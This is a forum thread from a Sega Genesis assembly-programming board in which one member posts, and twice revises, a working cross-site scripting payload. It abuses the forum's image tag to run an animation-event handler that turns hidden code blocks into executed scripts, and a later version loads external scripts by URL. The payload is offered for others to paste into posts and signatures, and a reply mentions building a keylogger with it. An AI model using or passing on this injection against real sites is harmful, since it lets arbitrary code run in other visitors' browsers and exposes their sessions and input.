ASM to Sega Genesis Platform

Would you like to react to this message? Create an account in a few clicks or log in to continue.
ASM to Sega Genesis Platform

All about assembly programming in the Sega Genesis console.


2 posters

    Better JavaScript injection/Cross Site Scripting (XSS)

    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Tue Sep 07, 2021 3:29 am

    This should be a more stable way to insert Javascript code. It creates a dummy iframe (which is only ever created once with this code active) that then copies code tags with the "xss" class as script tags when the iframe is loaded.

    Just insert this into your post or signature:
    Code:
    [img]&#34;onanimationstart=&#34;javascript:var d=document;if(d.getElementsByClassName(&#39;xd&#39;).length==0){var f=d.createElement(&#39;iframe&#39;);f.className=&#39;xd&#39;;f.onload=function(){for(let s of d.getElementsByClassName(&#39;xss&#39;)){if(s.nodeName==&#39;CODE&#39;){var c=d.createElement(&#39;script&#39;);c.type=&#39;text&#47;javascript&#39;;c.text=s.innerText;d.body.appendChild(c);}}};d.body.appendChild(f);}&#34; style=&#34;animation:xa;height:0;&#34;[/img]<style>@keyframes xa{} iframe.xd{height:0;} code.xss{height:0;display:none;}</style>

    And then you can do shit like
    Code:
    <code class="xss">
    alert("Burp");
    </code>

    Example:


    Also, I believe angle brackets in the code tags should be spaced out, or else it causes issues.




    var c = document.createElement("button");
    c.innerHTML = "Click me!";
    c.onclick = function() { alert("Burp"); };
    document.getElementsByClassName("xbtn")[0].appendChild(c);
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Tue Sep 07, 2021 3:32 am

    This is the one that works properly. The other threads had some kind of issue lmfao
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Tue Sep 07, 2021 3:40 am

    Seems to work on the mobile site, too!

    cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers cheers
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Tue Sep 07, 2021 4:02 am

    Slight update
    Code:
    <style>@keyframes xa{from {opacity: 0;} to {opacity: 0;}} iframe.xd{height:0;} code.xss{height:0;display:none;}</style>[img]&#34; style=&#34;animation:xa 1s;height:0;&#34; onanimationstart=&#34;javascript:var d=document;if(d.getElementsByClassName(&#39;xd&#39;).length==0){var f=d.createElement(&#39;iframe&#39;);f.className=&#39;xd&#39;;f.onload=function(){for(let s of d.getElementsByClassName(&#39;xss&#39;)){if(s.nodeName==&#39;CODE&#39;){var c=d.createElement(&#39;script&#39;);c.type=&#39;text&#47;javascript&#39;;c.text=s.innerText;d.body.appendChild(c);}}};d.body.appendChild(f);}&#34;[/img]
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Fri Sep 10, 2021 12:55 am

    New update

    Code:
    <style>@keyframes xa{0% {opacity: 0;} 100% {opacity: 0;}} iframe.xd,code.xss{height:0;} code.xss{display:none;}</style>[img]&#34; style=&#34;animation:xa 1s;height:0;&#34; onanimationstart=&#34;javascript:var d=document;if(d.getElementsByClassName(&#39;xd&#39;).length==0){var f=d.createElement(&#39;iframe&#39;);f.className=&#39;xd&#39;;f.onload=function(){for(let s of d.getElementsByClassName(&#39;xss&#39;)){if(s.nodeName==&#39;CODE&#39;){var c=d.createElement(&#39;script&#39;);c.text=s.innerText;if (s.title!=&#39;&#39;){c.src=s.title;} d.body.appendChild(c);}}};d.body.appendChild(f);}&#34;[/img]

    Now you can link an external script by putting the link to it in the title attribute.

    Code:
    <code class="xss" title="some-script.js"></code>
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Fri Sep 10, 2021 3:43 pm

    I'd like to see ya try

    Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing Laughing Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil clown clown clown clown clown clown clown clown clown clown clown clown clown affraid Basketball Basketball Basketball Basketball Basketball Basketball Basketball Basketball Basketball Basketball Basketball lol! lol! lol! lol! lol! lol! lol! lol! lol! lol! lol! lol! lol! lol! alien alien alien alien alien alien alien alien

    Better JavaScript injection/Cross Site Scripting (XSS) NcGrUzt
    Secret Agent
    Secret Agent


    Mensagens : 11
    Data de inscrição : 2021-09-10
    Localização : A secret place
    Current Project : Protecting users from hacking exploits

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Secret Agent Fri Sep 10, 2021 5:58 pm

    Ah thank you for the source code, Boss!


    Now, I can protect you and other members data!

    Smile
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Fri Sep 10, 2021 6:14 pm

    I mean, what data could you even steal using this form of XSS? lol, it only works on forums posts, and you can't really access the forum's databases with it (that would require some kind of SQL injection). A keylogger could be made, but again, it's only on forum posts, so really what good would it be?
    Secret Agent
    Secret Agent


    Mensagens : 11
    Data de inscrição : 2021-09-10
    Localização : A secret place
    Current Project : Protecting users from hacking exploits

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Secret Agent Fri Sep 10, 2021 6:29 pm

    I can use it to hide any passwords that were leaked, Boss.

    Very Happy
    avatar
    Ralakimus1


    Mensagens : 468
    Data de inscrição : 2021-06-29
    Localização : Moved on.

    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Ralakimus1 Fri Sep 10, 2021 6:31 pm

    ...passwords leaked by the account owners themselves, not from hax, lmfao

    Sponsored content


    Better JavaScript injection/Cross Site Scripting (XSS) Empty Re: Better JavaScript injection/Cross Site Scripting (XSS)

    Post  Sponsored content


      Current date/time is Thu May 16, 2024 11:03 pm